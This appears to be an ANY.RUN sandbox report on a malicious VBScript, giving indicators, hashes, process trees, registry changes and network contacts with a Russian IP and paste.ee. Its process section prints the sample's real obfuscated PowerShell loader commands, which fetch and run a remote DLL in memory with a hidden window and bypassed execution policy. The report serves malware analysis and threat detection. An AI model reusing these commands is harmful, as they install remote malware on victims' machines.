File name:

d212cb.vbs

Full analysis: https://app.any.run/tasks/dae379ab-d861-424b-a16e-d21e0ea921de
Verdict: Malicious activity
Analysis date: April 26, 2023, 20:58:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5:

B5910C4E533D2123AF7AC3D4C3F086CB

SHA1:

6DE5B0DB247638996DDAAA398BE7B2C1A5BCF660

SHA256:

E6B0E18DE6BE54F71AA356CA5F6D36B990ACDAF608E9140E3F172D61809D8A0C

SSDEEP:

6144:vWkHWkXWkHWk3WkHWkCWkHWkxWkHWk0WkHWknWkHWk8WkHWkDWkHWkEWkHWkkWkL:0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3676)
      • powershell.exe (PID: 116)
      • powershell.exe (PID: 844)

  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1348)
      • powershell.exe (PID: 844)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 1348)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 1348)
      • powershell.exe (PID: 116)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1348)
      • powershell.exe (PID: 116)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 1348)

    • Application launched itself

      • powershell.exe (PID: 116)

    • Probably download files using WebClient

      • powershell.exe (PID: 116)

    • Connects to the server without a host name

      • powershell.exe (PID: 844)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 844)

    • Unusual connection from system programs

      • powershell.exe (PID: 844)

  • INFO

    • Create files in a temporary directory

      • powershell.exe (PID: 3676)
      • powershell.exe (PID: 116)
      • powershell.exe (PID: 844)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
116"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAaoUWkAIAA9ACAAJwBaoUWAGkAcQBaoUWACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AaoUWMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAaoUWMAZQA2ADQAUwB0AaoUWIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAaoUWQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AaoUWIAaQBuAGcAKAAnAGgAdAB0AaoUWAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMgAzADUALwBkAGwAbAAvAGQAbABsADMALgB0AaoUWgAdAAnACkAKQA7AFsAcwB5AaoUWMAdABlAG0ALgBBAaoUWAAcABEAG8AbQBhAGkAbgBdADoAOgBDAaoUWUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAGUAKAAnAEMAZABXAEQAZABCAC4ARABLAGUAUwB2AGwAJwApAC4ARwBlAaoUWQATQBlAaoUWQAaABvAGQAKAAnAE4AbgBJAGEAVQBxACcAKQAuAEkAbgB2AG8AawBlACgAJABuAaoUWUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnADAALwBpAEUANwBqAE4ALwBkAC8AZQBlAC4AZQB0AaoUWMAYQBwAC8ALwA6AaoUWMAcAB0AaoUWQAaAAnACAALAAgACQAUgBvAGQAYQBDAG8AcAB5ACAALAAgACcARQBZAGoAQwAnACwAIAAnADAAJwAsACAAJwAxACcALAAgACcAJwAgACkAKQA=';$pvNxls = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('aoUW','H') ) );$pvNxls = $pvNxls.replace('GiqG', 'C:\Users\admin\AppData\Local\Temp\d212cb.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $pvNxlsC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
844"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\admin\AppData\Local\Temp\d212cb.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.235/dll/dll3.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('0/iE7jN/d/ee.etsap//:sptth' , $RodaCopy , 'EYjC', '0', '1', '' ))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1348"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\d212cb.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
3676"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbsC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
9 548
Read events
9 504
Write events
44
Delete events
0

Modification events

(PID) Process:(1348) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1348) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1348) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1348) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(844) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
0
Suspicious files
14
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3676powershell.exeC:\Users\admin\AppData\Local\Temp\habzhg5o.gio.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
116powershell.exeC:\Users\admin\AppData\Local\Temp\yle3nrti.rcx.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3676powershell.exeC:\Users\admin\AppData\Local\Temp\x3l0aucq.udv.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3676powershell.exeC:\Windows\Temp\Debug.vbstext
MD5:B5910C4E533D2123AF7AC3D4C3F086CB
SHA256:E6B0E18DE6BE54F71AA356CA5F6D36B990ACDAF608E9140E3F172D61809D8A0C
116powershell.exeC:\Users\admin\AppData\Local\Temp\ixpg0ddr.lzh.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3676powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
844powershell.exeC:\Users\admin\AppData\Local\Temp\dymruh0b.05z.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
844powershell.exeC:\Users\admin\AppData\Local\Temp\5rirbgvo.bje.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
844
powershell.exe
GET
200
5.42.199.235:80
http://5.42.199.235/pe/Rudepe.txt
RU
text
55.6 Kb
malicious
844
powershell.exe
GET
200
5.42.199.235:80
http://5.42.199.235/dll/dll3.txt
RU
text
13.3 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
844
powershell.exe
104.21.84.67:443
paste.ee
CLOUDFLARENET
suspicious
844
powershell.exe
5.42.199.235:80
IT Resheniya LLC
RU
malicious

DNS requests

Domain
IP
Reputation
paste.ee
  • 104.21.84.67
malicious

Threats

PID
Process
Class
Message
844
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 1
844
powershell.exe
Potential Corporate Privacy Violation
ET POLICY Pastebin-style Service (paste .ee) in TLS SNI
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
d212cb.vbs